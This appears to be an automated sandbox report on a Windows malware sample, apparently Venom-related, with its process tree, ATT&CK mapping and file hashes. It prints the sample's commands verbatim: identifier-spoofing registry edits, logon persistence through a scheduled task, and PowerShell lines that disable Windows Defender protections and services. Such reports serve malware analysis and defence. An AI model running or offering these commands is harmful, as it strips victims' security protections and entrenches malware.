- Modifies registry key
PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f3⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵PID:4280
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
PID:1048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f3⤵PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f3⤵PID:2916
-
C:\Windows\system32\reg.exereg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f4⤵
- Modifies registry key
PID:4216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f3⤵PID:5036
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f4⤵PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3596
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230691577617655145278624135504749615060234541767923233 /f4⤵
- Modifies registry key
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:5084
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2307226524275158221893917477315930337315721730617531 /f4⤵PID:4664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3728
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 23072265242751582218939174773159303373157217306 /f4⤵PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:1800
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3184
-
C:\Windows\system32\reg.exeREG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3240
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 230722652427515822189391747731593033731572 /f4⤵
- Modifies registry key
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:2200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f3⤵PID:3036
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 23072265242751 /f4⤵
- Modifies registry key
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f3⤵PID:5388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f3⤵PID:3364
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 230722652427515822189391747731593033731572173061753123277 /f4⤵
- Modifies registry key
PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f3⤵PID:4248
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.23072.26524-2751_582218939 /f4⤵PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f3⤵PID:6120
-
C:\Windows\system32\reg.exeREG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {23072-26524-2751-5822} /f4⤵
- Modifies registry key
PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f3⤵PID:2500
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f4⤵
- Modifies registry key
PID:1564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f3⤵PID:3800
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f4⤵
- Modifies registry key
PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f3⤵PID:5996
-
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f4⤵
- Modifies registry key
PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:5980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:3860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh winsock reset3⤵PID:5956
-
C:\Windows\system32\netsh.exenetsh winsock reset4⤵PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh int ip reset3⤵PID:5708
-
C:\Windows\system32\netsh.exenetsh int ip reset4⤵PID:564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall reset3⤵PID:3076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns3⤵PID:2064
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns4⤵
- Gathers network information
PID:5624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /release3⤵PID:5884
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /renew3⤵PID:5284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -d3⤵PID:1808
-
C:\Windows\system32\ARP.EXEarp -d4⤵PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache3⤵PID:1224
-
C:\Windows\system32\netsh.exenetsh interface ip delete arpcache4⤵PID:4264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe3⤵PID:4336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:5940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe3⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4832
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5224
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs4⤵
- System Location Discovery: System Language Discovery
PID:1400
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6040
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3380 -
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4580
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6104
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:3372
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:6016
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:5648
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:5836
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:2240
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:5816
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:3672
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:860
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:3848
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:388
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:1532
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵PID:5988
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵PID:3020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1520
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:1784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:3336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f4⤵PID:2784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵PID:884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵PID:932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵PID:4408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵PID:4696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵PID:896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:3992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:5844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:5528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:3208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:4396
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:4240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:5888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:4520
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:4192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:4560
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:5468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1172
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:5668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:3052
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
PID:4928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵PID:4940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\乃メᄃフ乙W乃のムム乙キゐリレム.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\Windows\SysWOW64\PING.EXEping -\Common 10 localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5944
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:460 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"2⤵
- Adds Run key to start application
PID:680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe1⤵PID:3252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe1⤵PID:5920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵PID:2192
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1File Deletion
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
395B
MD5ed60a6e229318430f77c588101134ab3
SHA1999aca0f516558c0ce3b501b0e0ac172c1304161
SHA2565cc8563947de29db37a6c6eda475c993246f054f56ddc34893ccaef9188f10b9
SHA512dc6ee59d582cec837eb89b9327f08da60980dcdde3c6ce4c6a6a20b59ecfda3b6a5a9e2d17b06536172a0c5d1cd739a81fb899ca4c86996d823daa1407abdea3
-
Filesize
711B
MD5165f73dc3352b322003dac336356a4dd
SHA1db064f1272024f22892e4164d3d90f08d47776a9
SHA256cfe26c1974b281174e137a76720270b1a1b46529974d35a0ca0e7d436cab9e4c
SHA5122c09f15443eff40940ccabcc1642f65af057bb9de1a9e884ba8cfe854b3e40e1fee3af29307dfb8c916aafeb0e8cdfbd7c6b90ddcc1b9c1c664ce488c483bf31
-
Filesize
443B
MD582d0aab78d68e662a3c836e45a50283e
SHA1a58dfc74331ce3958a021b02060f3e05523ed755
SHA256442ea26f0245897bda778c22b58c76d34e402e3c5f31af550bfb161c5febd633
SHA512ddf0d379bbd3d1dbb3ffb75a9dccf7c9e29b8562cf1674fb3d0a75112382849d0d6e3aae35115925ef4215aca2d6e98d9a522e95ac443c8d7a76f8132165507a
-
Filesize
1KB
MD563fea3bd8920a554c9385940d9c29568
SHA1fec70ace9502b07386d4317f99653c194e6dd72b
SHA25626c534c65e7f9e68328374bb0e6436e3c96bd92ccad33e271446e09ae395f3b3
SHA512afecd3b158836ff3f11984d60eaabe1e0072471301e30aa997e6e09614a279a1f4852d9e0da5b4ec8b2330378b67177db1cbad6890ab33d29d8b3dd693dbca09
-
Filesize
701B
MD5b8f25807f2c2d5d9f1b724c5c1fbebd9
SHA1f97aca350fdee3994376fb49c075f6b992504758
SHA256e2281b4d79ea1305d702fc3ae3d9d78f51fbafd7e32480f545cc2fc5ae0e4537
SHA512f97b860992024b69544f685465894ff9125a9fa7ee480b97288f9545acba2a80dd5dbd0b14e7463348503bbf65863ccd71fa94efc57350ffb8744c7a9e0ba392
-
Filesize
916KB
MD520e5bc2c26788de1138995f9fa2ad7c5
SHA14f909c814bba89f6058222d2658cc2123b39c463
SHA256594c9dc2d16dca813d55528ec60f84711ca58e828818eb31d42d8d99690eba44
SHA5125c634f834200ce33e8f1ab3e79ba34dc4ac28af780e6cfd4884abefdde85a14d006c0046a658843bd44baf29bb88700e764bcf4000a258edbfff96b533b66bde
-
Filesize
3.2MB
MD52ed95abbfe15c8d0f125b64d8687faa2
SHA137b83c14d0c89d7d328a7954b415cff8b0ce257a
SHA2565e8c4b41430a6ee2d3f72ddd41a5a9f5e6484a8ee143b404e1f45ca645802f30
SHA512f3e44541ecd5688795e44d8a27d7d968d54d84acdb94b707ad911a6635d0186f73efcaf2128946dcc7e8984bf3a0049ee33a048bb0127b1185a827e20eb4a575
-
Filesize
95KB
MD58f9a88eab3424835c4c3cd45142c1da1
SHA1a85396cdd944f2f486597a65f8a46425922c30c0
SHA2562efec2e1440efee7fb641d8468d6676456197eb50ef49236c081e0827f455909
SHA51210a625ea39d82707bfe94d35551818410d5564d1562d59b2e624b2ba29683732e434cd62694dbb681e31d67e2af750147c400dba63db088a4a8ee09326807b95
-
Filesize
587B
MD5ed9315b3f8b61567cba6abaa0c996599
SHA1c36f5bfbb4cc4a7e0b035bb60b938e41548df566
SHA25677409a1eec6c53740a5e35b580215dfbf38496d03fdfac0426e71544cde7239e
SHA512777fee00cb0fa3075ceba83eedc06bb06d9058517ee617d74df88b398b92943d15913497ffc1dee0a3d86096a2cef160d12159cbc3299253dc0d09fa92b03b9c